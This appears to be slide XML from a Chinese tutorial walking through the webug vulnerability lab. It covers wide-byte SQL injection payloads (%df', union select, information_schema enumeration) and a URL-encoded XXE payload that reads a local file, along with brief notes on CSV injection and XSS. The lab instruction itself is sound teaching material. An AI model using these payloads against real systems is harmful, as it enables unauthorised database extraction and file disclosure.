              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>width_byte_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=1%df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面发生报错</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>width_byte_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1%df‘ order by 2--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，发现存在两列   这里开始就和前面的第一关一模一样了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>width_byte_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1%df‘ union select 1,2 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>出现在页面中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>width_byte_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1%df‘ union select 1,database() --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询当前的数据库为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webug_width_byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6. http://192.168.80.136/control/sqlinject/width_byte_injection.php?id=1%df‘ union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者使用这个，一次性取出所有的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7. http://192.168.80.136/control/sqlinject/width_byte_injection.php?id=1%df‘ union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=0x77656275675f77696474685f62797465 --+(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注意：这里不能直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webug_width_byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ’,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>因为单引号被转义掉了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接下里就是正常的注入流程了！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2895892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BAC71-AD7D-44CA-907B-96A022DD2311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="289893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F9E809-7D6E-4B54-A596-8F0AC66A7064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290945" y="706582"/>
            <a:ext cx="11568546" cy="5943599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考资料： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/backlion/p/9302528.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/lvxiangan/article/details/80912870</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.freebuf.com/articles/web/177979.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定义： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个部分构成，它们分别是：文档类型定义（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Document Type Definition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的布局语言；可扩展的样式语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Extensible Style Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的样式表语言；以及可扩展链接语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Extensible Link Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XLL</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423160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5F8B5-F114-451E-9720-41AC8DB26F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="276038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-07_xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AFFEF48-BBC0-4729-8AF4-E2CC7F5DCF31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10556794" cy="4438842"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们可以将 图片中的代码进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码，然后借助第七关构造数据：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data= %3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%3f%3e%0a%3c%21%44%4f%43%54%59%50%45%20%41%4e%59%20%5b%0a%20%20%20%20%3c%21%45%4e%54%49%54%59%20%63%72%6f%77%20%53%59%53%54%45%4d%20%22%66%69%6c%65%3a%2f%2f%2f%43%3a%2f%70%68%70%53%74%75%64%79%2f%57%57%57%2f%2f%31%2e%74%78%74%22%3e%0a%5d%3e%0a%3c%6e%6f%74%65%3e%0a%20%20%20%20%3c%6e%61%6d%65%3e%26%63%72%6f%77%3b%3c%2f%6e%61%6d%65%3e%0a%3c%2f%6e%6f%74%65%3e%20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样我们就可以读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hello crow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由于不知道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件放在哪里，所以不再读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16270C63-E361-4576-A59F-E51AEBA3C7AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202529" y="416690"/>
            <a:ext cx="6989471" cy="2265218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3900809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BAC71-AD7D-44CA-907B-96A022DD2311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="289893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_csv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F9E809-7D6E-4B54-A596-8F0AC66A7064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290945" y="706582"/>
            <a:ext cx="11568546" cy="5943599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考资料： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.freebuf.com/vuls/195656.html</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934540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6184F1-CD17-496B-B297-0EBEDD3BB8A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="386875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871B31F4-AD75-461B-99E9-27B16C726940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346364" y="942109"/>
            <a:ext cx="11665527" cy="5680364"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，全称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，即跨站脚本攻击，某种意义上也是一种注入攻击，是指攻击者在页面中注入恶意的脚本代码，当受害者访问该页面时，恶意代码会在其浏览器上执行，需要强调的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不仅仅限于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，还包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等其它脚本语言。根据恶意代码是否存储在服务器中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以分为存储型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与反射型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型（非持久）：主要用于将恶意代码附加到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址的参数中，常用于窃取客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息和钓鱼欺骗。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型（持久型）：攻击者将恶意代码注入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器中并保存起来，只要客户端访问了相应的页面就会受到攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意： 不要使用较新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注：网上教程很多，比较详细，大家可以自行百度。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1627233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6184F1-CD17-496B-B297-0EBEDD3BB8A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
